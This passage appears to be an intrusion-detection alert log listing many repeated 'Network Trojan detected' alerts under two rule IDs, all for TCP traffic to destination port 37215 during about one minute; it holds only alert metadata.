                SID:2835222
                Source Port:42136
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.779842
                SID:2829579
                Source Port:52914
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.147190
                SID:2829579
                Source Port:47826
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.640789
                SID:2829579
                Source Port:54070
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.699275
                SID:2829579
                Source Port:54106
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.134607
                SID:2835222
                Source Port:37674
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.969651
                SID:2835222
                Source Port:43634
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.367326
                SID:2829579
                Source Port:55238
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.274853
                SID:2829579
                Source Port:38970
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.323352
                SID:2835222
                Source Port:60182
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.678571
                SID:2829579
                Source Port:51166
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.805448
                SID:2829579
                Source Port:46886
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.020139
                SID:2835222
                Source Port:58912
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.029525
                SID:2835222
                Source Port:40300
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.672571
                SID:2835222
                Source Port:44782
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.970953
                SID:2835222
                Source Port:48894
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.761215
                SID:2829579
                Source Port:59168
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.519385
                SID:2835222
                Source Port:43494
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.704441
                SID:2829579
                Source Port:39662
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.759929
                SID:2829579
                Source Port:43752
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.614141
                SID:2829579
                Source Port:40658
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.151575
                SID:2835222
                Source Port:60120
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.907329
                SID:2829579
                Source Port:46868
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.829140
                SID:2835222
                Source Port:47248
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.184403
                SID:2835222
                Source Port:58212
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.163258
                SID:2829579
                Source Port:50718
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.321618
                SID:2835222
                Source Port:33966
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.774926
                SID:2835222
                Source Port:55800
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.760950
                SID:2829579
                Source Port:39328
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.184599
                SID:2835222
                Source Port:36138
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.074374
                SID:2829579
                Source Port:58308
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.716459
                SID:2835222
                Source Port:49438
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.028406
                SID:2835222
                Source Port:45490
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.164881
                SID:2835222
                Source Port:33998
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.641640
                SID:2835222
                Source Port:40756
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.183418
                SID:2829579
                Source Port:40578
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.277395
                SID:2835222
                Source Port:33250
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.766353
                SID:2829579
                Source Port:53808
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.503845
                SID:2835222
                Source Port:48648
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.472462
                SID:2835222
                Source Port:58840
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.968638
                SID:2835222
                Source Port:35864
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.987599
                SID:2835222
                Source Port:45254
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.243306
                SID:2829579
                Source Port:57210
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.758837
                SID:2835222
                Source Port:50254
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.150854
                SID:2829579
                Source Port:37614
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.501989
                SID:2829579
                Source Port:41416
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.470607
                SID:2835222
                Source Port:50838
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:35.176878
                SID:2829579
                Source Port:38998
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.018312
                SID:2829579
                Source Port:38436
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.453638
                SID:2829579
                Source Port:46372
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.779200
                SID:2829579
                Source Port:55990
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.614591
                SID:2829579
                Source Port:34454
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.830355
                SID:2829579
                Source Port:35138
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.368623
                SID:2829579
                Source Port:56054
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.715508
                SID:2835222
                Source Port:35430
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.703633
                SID:2835222
                Source Port:49620
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.503189
                SID:2835222
                Source Port:38680
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.086109
                SID:2829579
                Source Port:37360
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.759300
                SID:2835222
                Source Port:36586
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.806783
                SID:2835222
                Source Port:55230
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.969610
                SID:2829579
                Source Port:53020
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.253653
                SID:2829579
                Source Port:33548
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.966273
                SID:2829579
                Source Port:45910
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.858449
                SID:2835222
                Source Port:46110
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.472947
                SID:2835222
                Source Port:60318
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.368699
                SID:2829579
                Source Port:38474
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.737590
                SID:2829579
                Source Port:34840
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.292395
                SID:2829579
                Source Port:58204
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.293206
                SID:2829579
                Source Port:59818
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.701770
                SID:2835222
                Source Port:51238
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.675898
                SID:2829579
                Source Port:34288
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.677183
                SID:2835222
                Source Port:57980
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.501304
                SID:2829579
                Source Port:33764
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:35.179774
                SID:2835222
                Source Port:48482
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.913620
                SID:2835222
                Source Port:59676
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.365505
                SID:2829579
                Source Port:56822
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.072594
                SID:2835222
                Source Port:56208
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.012663
                SID:2835222
                Source Port:37686
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.849959
                SID:2829579
                Source Port:55014
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.806178
                SID:2835222
                Source Port:59006
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.423005
                SID:2835222
                Source Port:39282
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.229393
                SID:2835222
                Source Port:39706
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.199917
                SID:2829579
                Source Port:45462
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.735368
                SID:2829579
                Source Port:45930
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.031369
                SID:2829579
                Source Port:47758
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.701415
                SID:2829579
                Source Port:59832
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.641522
                SID:2829579
                Source Port:46434
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.942623
                SID:2829579
                Source Port:45016
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.617616
                SID:2829579
                Source Port:38484
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.146623
                SID:2829579
                Source Port:51410
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.452262
                SID:2829579
                Source Port:44996
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.666730
                SID:2835222
                Source Port:52492
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.681890
                SID:2829579
                Source Port:50216
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.424258
                SID:2835222
                Source Port:33576
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.292455
                SID:2829579
                Source Port:47506
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.672758
                SID:2835222
                Source Port:58008
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.072786
                SID:2835222
                Source Port:50534
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.134167
                SID:2835222
                Source Port:54758
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.025487
                SID:2829579
                Source Port:48490
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.616226
                SID:2829579
                Source Port:54214
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.940636
                SID:2835222
                Source Port:60844
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.681980
                SID:2829579
                Source Port:55294
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.968508
                SID:2835222
                Source Port:44188
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.979978
                SID:2835222
                Source Port:52612
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.666223
                SID:2835222
                Source Port:37294
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.449934
                SID:2829579
                Source Port:34898
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.777781
                SID:2829579
                Source Port:38070
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.451222
                SID:2829579
                Source Port:57806
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.969627
                SID:2829579
                Source Port:38288
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.503663
                SID:2829579
                Source Port:39438
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.718246
                SID:2829579
                Source Port:60476
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.052252
                SID:2829579
                Source Port:60866
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.813216
                SID:2835222
                Source Port:41574
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.410798
                SID:2829579
                Source Port:34346
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.150980
                SID:2835222
                Source Port:47936
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.290471
                SID:2829579
                Source Port:35480
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.934277
                SID:2835222
                Source Port:54208
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.882943
                SID:2829579
                Source Port:33354
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.145674
                SID:2835222
                Source Port:37238
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.564534
                SID:2835222
                Source Port:44346
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.776621
                SID:2829579
                Source Port:40232
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.016489
                SID:2829579
                Source Port:51662
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.274576
                SID:2829579
                Source Port:54624
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.420487
                SID:2829579
                Source Port:52504
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.857883
                SID:2829579
                Source Port:57610
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.322548
                SID:2835222
                Source Port:52226
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.502660
                SID:2835222
                Source Port:57966
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.860718
                SID:2829579
                Source Port:39606
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.229444
                SID:2835222
                Source Port:36772
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.966095
                SID:2829579
                Source Port:35398
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.809995
                SID:2835222
                Source Port:43868
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.148733
                SID:2835222
                Source Port:58630
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.971362
                SID:2835222
                Source Port:45024
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.989364
                SID:2829579
                Source Port:44646
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.779257
                SID:2829579
                Source Port:42588
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.701973
                SID:2835222
                Source Port:38060
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.617805
                SID:2835222
                Source Port:34560
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.762244
                SID:2835222
                Source Port:54368
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.091285
                SID:2835222
                Source Port:48730
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.135194
                SID:2835222
                Source Port:38784
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.792001
                SID:2835222
                Source Port:45438
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.677238
                SID:2835222
                Source Port:52042
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.846642
                SID:2835222
                Source Port:37258
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.518168
                SID:2835222
                Source Port:41470
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.944542
                SID:2829579
                Source Port:55276
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.848007
                SID:2829579
                Source Port:51318
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.383826
                SID:2835222
                Source Port:49396
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.521499
                SID:2835222
                Source Port:32958
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.972368
                SID:2829579
                Source Port:45636
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.422986
                SID:2829579
                Source Port:40818
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.848893
                SID:2835222
                Source Port:47508
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.504494
                SID:2835222
                Source Port:51208
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.406619
                SID:2835222
                Source Port:55312
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.029828
                SID:2835222
                Source Port:36560
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.343842
                SID:2829579
                Source Port:45394
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.684863
                SID:2835222
                Source Port:39890
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.322043
                SID:2829579
                Source Port:41390
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.143131
                SID:2835222
                Source Port:48314
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.777954
                SID:2829579
                Source Port:56976
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.934309
                SID:2835222
                Source Port:35362
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.453310
                SID:2829579
                Source Port:50588
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.676448
                SID:2829579
                Source Port:41148
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.151460
                SID:2829579
                Source Port:49248
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.408880
                SID:2835222
                Source Port:50410
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.202542
                SID:2829579
                Source Port:50266
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.023140
                SID:2829579
                Source Port:33312
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.812473
                SID:2835222
                Source Port:45050
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.045708
                SID:2829579
                Source Port:43746
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.421745
                SID:2835222
                Source Port:56590
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.184954
                SID:2835222
                Source Port:35844
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.289770
                SID:2829579
                Source Port:52852
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:35.181655
                SID:2835222
                Source Port:60404
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.978540
                SID:2835222
                Source Port:49012
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.183225
                SID:2829579
                Source Port:49588
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.617751
                SID:2829579
                Source Port:38350
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.716183
                SID:2835222
                Source Port:59672
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.686836
                SID:2829579
                Source Port:43350
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.054645
                SID:2829579
                Source Port:57354
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:35.177417
                SID:2829579
                Source Port:43378
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.342221
                SID:2829579
                Source Port:48526
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.980655
                SID:2835222
                Source Port:33404
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.452583
                SID:2829579
                Source Port:52398
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.322002
                SID:2835222
                Source Port:36312
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.762787
                SID:2829579
                Source Port:33156
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.967271
                SID:2829579
                Source Port:55086
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.789338
                SID:2829579
                Source Port:33996
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.420275
                SID:2835222
                Source Port:53622
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.382793
                SID:2835222
                Source Port:52008
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.913792
                SID:2829579
                Source Port:55200
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.759161
                SID:2829579
                Source Port:48362
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.453588
                SID:2829579
                Source Port:55190
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.717920
                SID:2835222
                Source Port:42778
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.094834
                SID:2829579
                Source Port:44838
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.018516
                SID:2835222
                Source Port:60412
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.184149
                SID:2835222
                Source Port:38484
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.014445
                SID:2835222
                Source Port:59462
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.792686
                SID:2835222
                Source Port:60600
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.616887
                SID:2829579
                Source Port:35872
                Destination Port:37215
